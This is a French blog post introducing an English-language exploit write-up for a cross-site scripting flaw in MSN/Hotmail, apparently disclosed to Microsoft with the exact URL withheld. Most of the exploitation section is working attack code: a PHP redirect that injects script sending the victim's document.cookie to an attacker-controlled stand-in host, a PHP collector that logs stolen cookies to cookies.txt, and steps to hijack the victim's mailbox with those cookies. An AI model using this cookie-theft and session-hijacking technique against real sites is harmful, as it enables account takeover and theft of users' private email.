Une faille d'ampleur minimale, me permetterait d'acceder à n'importe quel boite email de type hotmail ou msn juste en insitant la personne à cliquer sur un lien malicieux.
Un remerciement au résponsable du laboratoire microsoft labo-microsoft.org , Mr Loïc thobois qui m'a aidé à remonter cette information aux responsables chez microsoft.
Le serveur concerné à été mis hors ligne, et les travaux de correction sont déjà lancés.
Ceci dis, je vais vous expliquer comment j'ai trouvé et comment j'ai pu exploiter cette faille, sans vous donner l'url exacte par mesure de sécurité.
Pour des raisons professionnelles, cet exploit a été redigé en anglais. Si vous le souhaitez je l'écrirais en français et en espagnol ;p
----------------------------------------------------------------------------------------------------------------------
/* MSN & HOTMAIL Cross Site Scripting Xploit
author : TLEMCANI Hamza
contact: hamza_at_supinfo_com
original url: http://tlemcani.typepad.fr/tlemcani_hamza/2007/02/pirater_la_boit.html
sevirity and vendor: Medium/High MSN.COM
Tested on : All firefox and IE versions
Description :
First of all, I would like to say that this is a Simple XSS vulnerability that makes me able in some ways to take a total control of any hotmail/msn mail access during 24 Hours.Those kind of vulnerability are known seen years, but they are still available on some parts of msn.com and that's why i am posting this message. Some of them need some special syntax to be able to exploit them. And it's the case of this one i m going to present.
Oh i ve forgot, If you don't know what is a XSS vulnerability and don't know how to exploit it then just stop reading. I m not going to give you the exact url , till i haven't the rights from Micrsoft.
Disclaimer:
this entire document is for eductional, testing and demonstrating purpose only. Modification use and/or publishing
this information is entirely on your OWN risk. The information provided in this advisory is to be used/tested on your
OWN machine/Account. I cannot be held responsible for any of the above.
Exploitation :
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls. such as the same origin policy. Recently, vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits.
In this case, i found an url wich looks like :
http://xxx.xxx.msn.com/xxx/xxx/xxx/mmt.asp?[...]&msn_link=
I ve tried different syntaxes, but didn't work.. I was trying to introduce some javascripts request on the page, so i see if the website can execute a malicious code..But no look.
Few minutes after, by analysing the source code, and after a lot of tests, i found that we had to add an %22%E3 to the url, so the page can execute without no problem our requests.
The First thing i ve tried was:
and its worked! I got an error message with all my cookies.
During normal operation, cookies are sent back and forth between MSN servers and the computer of the browsing user. Since cookies may contain sensitive information their values should not be accessible to other computers. Cookies theft is any process allowing an unauthorised party to receive a cookie. And this is what I ve tried.
So first of all . I created 2 files on one of my websites.
The first was named redirection.php.
This is the source code of this page :
<?php
header("Location: http://xxx.xxx.msn.com/xxx/xxx/xxx/mmt.asp?[...]&msn_link=%22%3E%3Cscript%3Edocument.location.href= 'http://www.yourwebsite.com/hack-msn.php?cookie='%2Bescape(document.cookie);%3C/script%3E");
exit;
?>
For those who have already understood the redirection,
i ve also created a file called hack-msn.php. The first file is redirecting the user to the xss vulnerability that it's programmed to stole your cookies and host them on my website, thanks to the second file.
There is the source code of hack-msn.php :
<?php
$filename = "cookies.txt";
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, 'a'))
{
echo "Erreur: Impossible d écrire sur le fichier cookies";
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
{
echo "Erreur lors de l ectriture sur le fichier cookies";
exit;
}
}
echo "<script>window.location='http://www.labo-microsoft.org'</script>";
fclose($handle);
exit;
}
echo "rien à écrire dans le fichier cookies";
exit;
?>
aight, when the man is getting redirected to the xss vulnerability , his cookies are automaticaly stolen and saved on a file named cookies.txt .
Then I just have to change my cookies by my victim's cookies and type this url
http://by21fd.bay21.hotmail.msn.com/cgi-bin/hmhome?fti=yes .
Greetz to ZATAZ.COM, _6m0_HaCk from morx who found also some XSS vulnerability on msn/hotmail.
----------------------------------------------------------------------------------------------------------------------
TLEMCANI Hamza.
Commentaires